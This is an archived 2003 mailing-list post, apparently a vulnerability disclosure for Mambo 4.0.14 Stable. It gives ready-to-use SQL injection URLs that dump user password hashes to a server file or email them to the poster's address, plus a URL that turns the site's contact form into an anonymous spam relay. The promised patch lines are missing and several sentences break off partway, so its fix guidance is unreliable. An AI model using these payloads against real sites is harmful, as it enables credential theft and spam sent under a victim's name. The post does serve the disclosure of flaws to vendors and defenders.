mailing list archives
Several Mambo 4.0.14 Stable Exploits
From: Lifo Fifo <lifofifo20 () yahoo com>
Date: 18 Sep 2003 05:25:19 -0000
Product : Mambo 4.0.14 Stable
Website : http://www.mamboserver.com/
Status : Vendor notified via email
Imapct : Search for "Mambo Open Source is Free Software released under the GNU/GPL License." (with quotes) returned
more than 500 results.
Credit : lifofifo, hackingzone.org
Originally posted at : http://www.hackingzone.org
First of all, you will get a bunch of error when you try to open banners.php without any arguments. This does reveal
some vital information like path on the server. This information is very important when using "into outfile" feature of
* First Exploit
http://localhost/mambo/banners.php?op=click&bid=100 UNION select password from mos_users where 1=1 into outfile
Here it's required that magic_quotes_gpc is turned off. And MySQL 4.x is running. Because older versions don't support
There are other cases of SQL Injection there. But they won't be a trouble if you have magic_quotes_gpc turned on.
* Second Exploit
This one will work in all the cases. No matter magic_quotes_gpc/register_globals are on/off. The bug is in
"emailfriend/emailarticle.php" file. In this file, the variable $id is not checked. Therefore, it is possibgle to get
the md5() password emailed to you. Check the following,
http://localhost/mambo/emailfriend/emailarticle.php?submit=submit&email=lifofifo () hackingzone org&youremail=webmaster
() hackingzone org&id=100 UNION select username,email,password from mos_users where id=1
In this case, username, md5() hashed password and email address of user with id 1 will get deliverd to lifofifo ()
Note : The server needs to using MySQL 4.x
Fix : Add the follwing lines on the top of the "emailfriend/emailarticle.php" script.
Note : Same patch should also be applied to "emailfriend/emailfaq.php"
* Third Exploit : Anonymous Emailer
In contact.php file, there is a function call like "sendmail($text, $from, $name, $email_to, $sitename);". You can pass
variables from the url. So if you open it like,
http://localhost/mambo/contact.php?op=sendmail&text=this is spam&from=none&name=Admin&email_to=lifofifo () hackingzone
It will send email to lifofifo () hackingzone org from "None".
And this is really enough to give your site a bad name. One can spam from YOUR own site. Becase IP of the email sender
and IP of your site will be same and therefor the integrity of the message won't be a doubt.
This will also work irrespective of magic_quotes_gpc and register_globals.
- Several Mambo 4.0.14 Stable Exploits Lifo Fifo (Sep 18)